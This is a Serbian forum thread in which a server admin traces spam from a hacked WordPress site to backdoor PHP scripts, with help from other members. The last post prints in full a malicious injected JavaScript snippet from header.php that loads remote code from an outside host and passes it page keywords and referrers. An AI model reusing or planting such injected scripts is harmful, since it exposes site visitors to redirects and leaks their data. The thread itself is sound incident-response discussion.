Srodne teme
Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

mail server, bot salje mailove

[es] :: Linux/UNIX serveri i servisi :: mail server, bot salje mailove

Strane: 1 2

[ Pregleda: 12037 | Odgovora: 27 ] > FB > Twit

Postavi temu Odgovori

Autor
Pretraga teme: Traži
Markiranje Štampanje RSS

anon70939

Član broj: 70939
Poruke: 2823



+6883 Profil

icon mail server, bot salje mailove13.04.2016. u 21:51 - pre 109 meseci
Imam novu muku :/
Doduse ovo nije produkcioni server. Doduse ima par nekih manje bitnih sajtova koji su hostovani na njemu.

Uglavnom, od Hetznera mi je stigao mail da nam je IP blacklistovana na vise mesta pa i na CBL.

Instalirao sam i skenirao server sa rkhunter i sa chkrootkit ali nista nije pronadjeno.

Kad udarim komandu

tail -f /usr/local/psa/var/log/maillog


Dobijam u sekundi gomile ovakvih redova

Apr 13 22:40:12 africka-sljiva postfix/error[17841]: E3DD726A536B: to=<delores_cole@****.***>, relay=none, delay=25595, delays=25560/36/0/0.17, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.****.***[176.9.215.29]:25: Connection timed out)
Apr 13 22:40:12 africka-sljiva postfix/error[17903]: E2C18269FC4E: to=<esther_grant@****.***>, relay=none, delay=42378, delays=42342/36/0/0.17, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.****.***[176.9.215.29]:25: Connection timed out)
Apr 13 22:40:12 africka-sljiva postfix/error[17881]: E1FEA269EB7A: to=<rita_willis@****.***>, relay=none, delay=55689, delays=55654/36/0/0.17, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.****.***[176.9.215.29]:25: Connection timed out)
Apr 13 22:40:12 africka-sljiva postfix/error[17889]: E0AEB2692C55: to=<jo_gray@****.***>, relay=none, delay=134892, delays=134857/36/0/0.17, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.****.***[176.9.215.29]:25: Connection timed out)
Apr 13 22:40:12 africka-sljiva postfix/error[18230]: 567F12687A62: to=<[email protected]>, relay=none, delay=296013, delays=295980/33/0/0.17, dsn=4.0.0, status=deferred (delivery temporarily suspended: host mailin-04.mx.aol.com[152.163.0.100] refused to talk to me: 421 mtaig-aal03.mx.aol.com Service unavailable - try again later)
Apr 13 22:40:12 africka-sljiva postfix/pickup[17758]: 282092688C36: uid=10002 from=<luz_ortiz@****.***>
Apr 13 22:40:12 africka-sljiva postfix/cleanup[19392]: warning: connect to Milter service unix:/spamass/spamass.sock: No such file or directory
Apr 13 22:40:12 africka-sljiva postfix/cleanup[19392]: 282092688C36: message-id=<3f8ace6a9a673581ac04da2cf8598c7c@****.***>
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 0E5592681E9C: removed
Apr 13 22:40:12 africka-sljiva opendkim[1053]: 282092688C36: no signing table match for 'luz_ortiz@****.***'
Apr 13 22:40:12 africka-sljiva postfix/cleanup[19384]: 2854C2688C8E: message-id=<20160413204012.2854C2688C8E@**-**.***>
Apr 13 22:40:12 africka-sljiva opendkim[1053]: 282092688C36: no signature data
Apr 13 22:40:12 africka-sljiva postfix/cleanup[19389]: 285432681E9C: message-id=<20160413204012.285432681E9C@**-**.***>
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 999BB26920A8: from=<>, size=11612, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9E38C2699B31: from=<>, size=3734, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 90FBC2699034: from=<>, size=3612, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 957F12684D79: from=<>, size=10146, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 954C7269A854: from=<>, size=10787, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 99B96268B8CF: from=<>, size=10811, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 90FF5269BAB6: from=<>, size=10900, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9918D2684AEE: from=<>, size=10779, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9257A2690BC0: from=<dianne_haynes@****.***>, size=1542, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9A23D268A34E: from=<>, size=10690, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 90F0D2688F55: from=<>, size=10219, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 90FB026990AD: from=<>, size=10027, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9B37F2686860: from=<>, size=3859, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9BA392688662: from=<>, size=11635, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 972B0268C345: from=<>, size=11199, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9D6FB2690DD9: from=<>, size=11291, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9DC1726A6B64: from=<>, size=10260, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9F403268B5CE: from=<>, size=10666, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 926B8268C6AD: from=<>, size=9521, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9A8E52692887: from=<ellen_wright@****.***>, size=7884, nrcpt=1 (queue active)


Koji su koraci da resim ovo?

Da li moze da bude problematicno to sto sam sa jednog drugog servera gde su nam hakovali neki WP sajt, prebacili ga na ovaj server tako sto smo instalirali clean WP, i iskopirali samo folder sa temom, Ali smo prebacili i bazu koju nismo proveravali da li je infected, posto nisam znao kako to da proverim

Pitam da li postoji mogucnost da je to problem, posto najveci deo ovih adresa na koje pokusava da posalje mail su sa tim domenom tog sajta.
 
Odgovor na temu

Aleksandar Đokić

Član broj: 13478
Poruke: 4793
87.116.180.*



+638 Profil

icon Re: mail server, bot salje mailove13.04.2016. u 22:00 - pre 109 meseci
A da ne salje taj sajt tj. neka skripta koju si prebacio?

Pogledaj u queue-u za neki ID sta konkretno mejl sadrzi pa ces u hederima imati vise informacija. PHP obicno ubacu ono... kako se zove sad... koja skripta salje itd.
 
Odgovor na temu

anon70939

Član broj: 70939
Poruke: 2823



+6883 Profil

icon Re: mail server, bot salje mailove13.04.2016. u 22:10 - pre 109 meseci
Sad cu to da vidim.

Nadjoh u medjuvremenu ovo uputstvo, gde se bas pretpostavlja da je neka php skripta i nacin da detektujem koja

https://kb.plesk.com/en/114845
 
Odgovor na temu

Miroslav Strugarevic

Član broj: 5038
Poruke: 2689



+68 Profil

icon Re: mail server, bot salje mailove13.04.2016. u 23:19 - pre 109 meseci
Mozda da pokrenes lsof na serveru i da pratis koji se procesi konektuju na port 25 pa da na osnovu PID-a saznas ko salje mail-ove.

watch -n 1 "lsof -nPi tcp:25"

Prikačeni fajlovi
lsof.png lsof.png - 80.51k
 
Odgovor na temu

Miroslav Strugarevic

Član broj: 5038
Poruke: 2689



+68 Profil

icon Re: mail server, bot salje mailove13.04.2016. u 23:31 - pre 109 meseci
Ako ti je websajt "busan" onda mozes da ocekujes da ti se neko infiltrira na server i posle brisanja te email skripte. Zato je najbolje da sve vratis iz bekapa i da OBAVEZNO redovno radis update OS-a. Takodje bi bilo zgodno da uradis update websajta (ako je CMS u pitanju), ili da ti programer proveri sta moze da bude nacin kako ti taj neko ubacuje te gluposti.

Pogledaj i ovo: https://github.com/rfxn/linux-malware-detect
 
Odgovor na temu

Aleksandar Đokić

Član broj: 13478
Poruke: 4793
87.116.180.*



+638 Profil

icon Re: mail server, bot salje mailove14.04.2016. u 02:17 - pre 109 meseci
Plesk je... znaci sajt je pod nekim userom koji nema nikakva prava, pa nije mnogo strasno.

Moze da se nakaci neko jedino reverznim shell-om, procita "passwd" i to bi bilo to - ako ne idemo u sf vode da uradi neki "privilege escalation" pa tako dobije veca prava.

U stvari je, kod takvih situacija najopasnije ako postoje drugi sajtovi pod isti userom, ili postoje fajlovi sa lose podesenim permisijama, onda obicnim nagadjanjem putanje i symlinkom moze da procita i/ili izmeni te fajlove (dok sam radio hosting to mi se desavalo 2 puta nedeljno, naravno kad su dozvole u redu ne mogu nista).
 
Odgovor na temu

maksvel

Moderator
Član broj: 107376
Poruke: 2417

Jabber: maksvel
Sajt: maksvel.in.rs


+161 Profil

icon Re: mail server, bot salje mailove14.04.2016. u 08:01 - pre 109 meseci
A čekaj, da nije mail-server open-relay? Da li je to uopšte moguće ako je shared hosting?
 
Odgovor na temu

Aleksandar Đokić

Član broj: 13478
Poruke: 4793
87.116.180.*



+638 Profil

icon Re: mail server, bot salje mailove14.04.2016. u 14:31 - pre 109 meseci
Moguce je, ali u pitanju je Plesk, pa je malo verovatno.
 
Odgovor na temu

Miroslav Strugarevic

Član broj: 5038
Poruke: 2689



+68 Profil

icon Re: mail server, bot salje mailove14.04.2016. u 19:23 - pre 109 meseci
Bilo bi lepo da neko posalje i neki link :D (ako nista drugo)

https://wiki.hetzner.de/index.php/Mailserver_Relaytest/en
 
Odgovor na temu

anon70939

Član broj: 70939
Poruke: 2823



+6883 Profil

icon Re: mail server, bot salje mailove14.04.2016. u 21:25 - pre 109 meseci
Ne stizem da vam odgovorim, na putu sam :).
Dedicated server, Debian 8.1+ LAMP sa Plesk 2.15
 
Odgovor na temu

anon70939

Član broj: 70939
Poruke: 2823



+6883 Profil

icon Re: mail server, bot salje mailove15.04.2016. u 23:13 - pre 109 meseci
Citat:
Miroslav Strugarevic:
Mozda da pokrenes lsof na serveru i da pratis koji se procesi konektuju na port 25 pa da na osnovu PID-a saznas ko salje mail-ove.

watch -n 1 "lsof -nPi tcp:25"

http://static.elitesecurity.org/uploads/3/6/3669158/lsof.png


Nadjoh malo vremena,
okinuh tu komandu i u sekundi mi se pojavilo gomile razultata poput ovog


I kad sam kucao komandu

lsof -p 13002


Dobio sam

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
smtp 13002 root cwd DIR 9,2 4096 40370312 /var/spool/postfix
smtp 13002 root rtd DIR 9,2 4096 2 /
smtp 13002 root txt REG 9,2 121472 50728758 /usr/lib/postfix/smtp
smtp 13002 root mem REG 9,2 47712 23724184 /lib/x86_64-linux-gnu/libnss_files-2.19.so
smtp 13002 root mem REG 9,2 43592 23724186 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
smtp 13002 root mem REG 9,2 31632 23724182 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
smtp 13002 root mem REG 9,2 14664 23724178 /lib/x86_64-linux-gnu/libdl-2.19.so
smtp 13002 root mem REG 9,2 1738176 23724175 /lib/x86_64-linux-gnu/libc-2.19.so
smtp 13002 root mem REG 9,2 84856 23724189 /lib/x86_64-linux-gnu/libresolv-2.19.so
smtp 13002 root mem REG 9,2 89104 23724181 /lib/x86_64-linux-gnu/libnsl-2.19.so
smtp 13002 root mem REG 9,2 1840496 51386617 /usr/lib/x86_64-linux-gnu/libdb-5.3.so
smtp 13002 root mem REG 9,2 137440 23724089 /lib/x86_64-linux-gnu/libpthread-2.19.so
smtp 13002 root mem REG 9,2 113520 51386508 /usr/lib/x86_64-linux-gnu/libsasl2.so.2.0.25
smtp 13002 root mem REG 9,2 2062720 51386697 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
smtp 13002 root mem REG 9,2 392312 51386684 /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0
smtp 13002 root mem REG 9,2 257536 50610097 /usr/lib/libpostfix-util.so.1.0.1
smtp 13002 root mem REG 9,2 260656 50609840 /usr/lib/libpostfix-global.so.1.0.1
smtp 13002 root mem REG 9,2 22312 50609932 /usr/lib/libpostfix-dns.so.1.0.1
smtp 13002 root mem REG 9,2 100704 50609974 /usr/lib/libpostfix-tls.so.1.0.1
smtp 13002 root mem REG 9,2 38632 50609972 /usr/lib/libpostfix-master.so.1.0.1
smtp 13002 root mem REG 9,2 140928 23724090 /lib/x86_64-linux-gnu/ld-2.19.so
smtp 13002 root 0u CHR 1,3 0t0 1028 /dev/null
smtp 13002 root 1u CHR 1,3 0t0 1028 /dev/null
smtp 13002 root 2u CHR 1,3 0t0 1028 /dev/null
smtp 13002 root 3r FIFO 0,8 0t0 39333405 pipe
smtp 13002 root 4w FIFO 0,8 0t0 39333405 pipe
smtp 13002 root 5u unix 0xffff8800d4851480 0t0 39333403 socket
smtp 13002 root 6u unix 0xffff8800d4851b80 0t0 39333401 private/plesk-213.2**.***.*-
smtp 13002 root 7u unix 0xffff88057fdd38c0 0t0 39332241 socket
smtp 13002 root 8u REG 9,2 0 40370753 /var/spool/postfix/pid/unix.plesk-213.2**.***.*-
smtp 13002 root 10u 0000 0,9 0 7688 anon_inode
smtp 13002 root 11r FIFO 0,8 0t0 39332251 pipe
smtp 13002 root 12w FIFO 0,8 0t0 39332251 pipe
smtp 13002 root 123r FIFO 0,8 0t0 39333406 pipe
smtp 13002 root 124w FIFO 0,8 0t0 39333406 pipe



Je l' to znaci da mi root salje mailove :o
Prikačeni fajlovi
2.png 2.png - 471.15k
 
Odgovor na temu

anon70939

Član broj: 70939
Poruke: 2823



+6883 Profil

icon Re: mail server, bot salje mailove15.04.2016. u 23:43 - pre 109 meseci
Sto se tice open relay,
nadjoh na pleskovom sajtu kako da proverim

https://kb.plesk.com/en/1394


root@africka-sljiva ~ # telnet mail.****.*** 25
Trying 213.***.***.*...
Connected to mail.****.***.
Escape character is '^]'.
220 africka-sljiva.****.*** ESMTP Postfix (Debian/GNU)
mail from: [email protected]
250 2.1.0 Ok
rcpt to: [email protected]
454 4.7.1 <[email protected]>: Relay access denied


izlupa sam neke adrese, valjda je to ok :), i izgleda nije server open relay

I u Plesku mi je podeseno po defaultu da nije Open relay


I u queue mi stoje preko 65000 mailova, najstariji je 3 dana star.... :o
I svuda mi pise da se mailovi salju sa tog sajta kojeg sam pomenuo da sam transferovao na ovaj server. jer u domenu tog maila vidim taj domen.

[Ovu poruku je menjao CoyoteKG dana 16.04.2016. u 00:53 GMT+1]
Prikačeni fajlovi
relay.JPG relay.JPG - 15.56k
 
Odgovor na temu

Aleksandar Đokić

Član broj: 13478
Poruke: 4793
*.dynamic.sbb.rs.



+638 Profil

icon Re: mail server, bot salje mailove16.04.2016. u 02:43 - pre 109 meseci
Rekoh ti, pogledaj heder tih mejlova.
 
Odgovor na temu

anon70939

Član broj: 70939
Poruke: 2823



+6883 Profil

icon Re: mail server, bot salje mailove17.04.2016. u 12:43 - pre 109 meseci
Da... u headeru se poklapa da je user od ovog sajta koji sam transferovao :/

Code:

Received: by africka-sljiva.****.*** (Postfix, from userid 10002)
    id E9F42268377C; Sat,  9 Apr 2016 08:10:55 +0200 (CEST)
To: [email protected]
Subject: Wanna f%ck a pretty babe?
X-PHP-Originating-Script: 10002:xml.php(1948) : eval()'d code
Date: Sat, 9 Apr 2016 08:10:55 +0200
From: Constance Reed <constance_reed@*****.***>
Message-ID: <37547b73f8f42d39631fd08706a777d1@*****.***>
X-Priority: 3
X-Mailer: PHPMailer 5.2.9 (https://github.com/PHPMailer/PHPMailer/)
MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="b1_37547b73f8f42d39631fd08706a777d1"
Content-Transfer-Encoding: 8bit


Sta znaci ovo?
X-PHP-Originating-Script: 10002:xml.php(1948) : eval()'d code

To je ta neka xml.php skripta koja salje mailove?
Nasao sam je u root-u tog sajta. Evo okacih u attachment zipovano.

Nije mi samo jasno kako se stvorila tu. Jer kao sto rekoh, instalirao sam nov WP, i iskopirao samo wp-content...
Prikačeni fajlovi
xml.zip xml.zip - 42.11k
 
Odgovor na temu

maksvel

Moderator
Član broj: 107376
Poruke: 2417

Jabber: maksvel
Sajt: maksvel.in.rs


+161 Profil

icon Re: mail server, bot salje mailove17.04.2016. u 16:33 - pre 109 meseci
Ovo mi definitivno liči na neki malver. Kodiran niz naredbi, koje nisu čitljive na prvi pogled, a koje se izvršavaju tako što se dekodiraju u veliki string normalnih naredbi, koje se posle izvrše sa eval.
Verujem da možeš slobodno da obrišeš ovaj fajl ili bar da ga preimenuješ za početak, pa da se vidi sa čim je eventualno još povezan, šta je eksploitovano da bi se on tu našao itd.
Trebalo bi da bar pustiš neki pentest program da vidiš u kakvom ti je stanju sajt, w3af ili ZAP npr.
 
Odgovor na temu

anon70939

Član broj: 70939
Poruke: 2823



+6883 Profil

icon Re: mail server, bot salje mailove23.04.2016. u 20:08 - pre 109 meseci
Poginuh na poslu, pa sam mislio da sam odlozio resavanje problema, pukim stopiranjem mail servisa, kako mailovi ne bi isli dalje.
Posto mi na tom serveru za sad i nije potreban mail servis.

Ali opet poceli da mi stizu od hetznera "Abuse" mailovi kako treba to da resim.
Pogledam u servisima u Plesku, oni su opet startovani.

Nesto ih je startovalo. Nadam se da mi nije root user kompromitovan
Kako mogu da vidim koji user je startovao te servise i kad?


U attach je par php fajlova koji imaju modified date noviji od ostlaih.
Pretpostavljam da je sve to malware


Sklonio bih sajt sa servera, i mozda bi to resilo problem (jedino me strah sta je moglo da startuje servise... nadam se da plesk ima nesto automatizovano pa ih podize posle nekog vremena).
Pre nego sto obrisem sajt, moram da nadjem nacin sa w3af i ZAP da vidim kako mi je neko uopste ubacio taj malware...
Prikačeni fajlovi
virus.zip virus.zip - 49.11k
 
Odgovor na temu

maksvel

Moderator
Član broj: 107376
Poruke: 2417

Jabber: maksvel
Sajt: maksvel.in.rs


+161 Profil

icon Re: mail server, bot salje mailove23.04.2016. u 20:36 - pre 109 meseci
Da, ovo su neki... pa ne virusi, ali bekdor skriptovi
Evo analize sa VirusTotal-a.


Je li to neki CMS?

Trebalo bi da u nekom od logova imaš kada je startovan servis.
Prikačeni fajlovi
malscript.png malscript.png - 34.35k
 
Odgovor na temu

anon70939

Član broj: 70939
Poruke: 2823



+6883 Profil

icon Re: mail server, bot salje mailove23.04.2016. u 20:48 - pre 109 meseci
Wordpress sajt je u pitanju.

Sad sam instalirao ovaj Zed, i pustio attack i zavrsio se.
Odoh sad da vidim kako se gledaju ovi rezultati :)
I kako da vidim sta je neko uspeo da iskoristi da ubacio ove bekdorove


edit:


Code:
Description:
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Other info:
At "High" threshold this scanner will not alert on client or server error responses.
Solution:
Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY.  ALLOW-FROM allows specific websites to frame the web page in supported web browsers).

Reference:
http://blogs.msdn.com/b/ieinte...king-with-x-frame-options.aspx


Code:

Description:
A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

Solution:
Ensure that the HttpOnly flag is set for all cookies.

Reference:
www.owasp.org/index.php/HttpOnly

Code:

Description:
Web Browser XSS Protection is not enabled, or is disabled by the configuration of the 'X-XSS-Protection' HTTP response header on the web server

Other info:
The X-XSS-Protection HTTP response header allows the web server to enable or disable the web browser's XSS protection mechanism. The following values would attempt to enable it: 
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=http://www.example.com/xss
The following values would disable it:
X-XSS-Protection: 0
The X-XSS-Protection HTTP response header is currently supported on Internet Explorer, Chrome and Safari (WebKit).
Note that this alert is only raised if the response body could potentially contain an XSS payload (with a text-based content type, with a non-zero length).

Solution:
Ensure that the web browser's XSS filter is enabled, by setting the X-XSS-Protection HTTP response header to '1'.

Reference:
https://www.owasp.org/index.ph...ipting)_Prevention_Cheat_Sheet
https://blog.veracode.com/2014...-for-setting-security-headers/

Code:

Description:
The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

Other info:
This issue still applies to error type pages (401, 403, 500, etc) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.
At "High" threshold this scanner will not alert on client or server error responses.

Solution:
Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.
If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

Reference:
http://msdn.microsoft.com/en-u.../ie/gg622941%28v=vs.85%29.aspx
https://www.owasp.org/index.php/List_of_useful_HTTP_headers




[Ovu poruku je menjao CoyoteKG dana 23.04.2016. u 22:02 GMT+1]
Prikačeni fajlovi
zed1.JPG zed1.JPG - 20.65k
 
Odgovor na temu

maksvel

Moderator
Član broj: 107376
Poruke: 2417

Jabber: maksvel
Sajt: maksvel.in.rs


+161 Profil

icon Re: mail server, bot salje mailove23.04.2016. u 20:52 - pre 109 meseci
Možeš proguglati - ima jako puno tutorijala kako ukloniti malware sa Wordpress-a, jer je on baaš česta meta.
Npr: https://aw-snap.info/articles/spam-hack-wordpress.php

Upravo tvoj slučaj:
Citat:
You are checking for a couple of things, first any obfuscated php code usually base64_decode but occasionally preg_replace.


Probaj sa nekim od ovih security plaginova. Nisam ih koristio lično, ali bi trebalo da pomognu.
 
Odgovor na temu

anon70939

Član broj: 70939
Poruke: 2823



+6883 Profil

icon Re: mail server, bot salje mailove23.04.2016. u 21:05 - pre 109 meseci
Wordfence koristim vec na vecini sajtova, i nije mi jasno kako ga nemam ovde.
Bio sam siguran da je instaliran... o.O
Zato sam se i cudio kako nista ne prijavljuje

Sad cu bas probati. on ima opciju za scan

edit:
nasao mi je desetak php skripti...
Doduse nije prepoznao onu xml.php sto sam gore negde okacio, sto mi salje mailove.
Sutra cu da kupim Premium verziju, koja vidim da ima opciju i za to da cekira da li salje nesto mailove...


Nego nevezano za to.
Primetio sam da kad otvaram stranicu, da mi to dugo radi, a dole u dnu pise
"waiting for www.tnmatricsschools.com", i onda tek posle tridesetak sekundi otvori stranicu...

Uradio sam search svih fajlova da vidim gde se pominje taj fajl i naisao u header.php ovo sto je u zip attach.
nalazi se u <head></head> tagovima


Code:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://www.tnmatricschools.com...in.php?c_utt=I92930&c_utm='+encodeURIComponent('http://www.tnmatricschools.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>



cemu sluzi ova skripta?
guglam, ali ne vidim neko objasnjenje

[Ovu poruku je menjao CoyoteKG dana 23.04.2016. u 23:00 GMT+1]


sad mi pada na pamet, da mozda ta skripta proverava lokaciju odakle neko browsuje pa ga preusmerava na srpski ili nemacki deo sajta, odnosno jezik.
Je l' moze biti to?

[Ovu poruku je menjao CoyoteKG dana 23.04.2016. u 23:15 GMT+1]
 
Odgovor na temu

[es] :: Linux/UNIX serveri i servisi :: mail server, bot salje mailove

Strane: 1 2

[ Pregleda: 12037 | Odgovora: 27 ] > FB > Twit

Postavi temu Odgovori

Srodne teme
Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.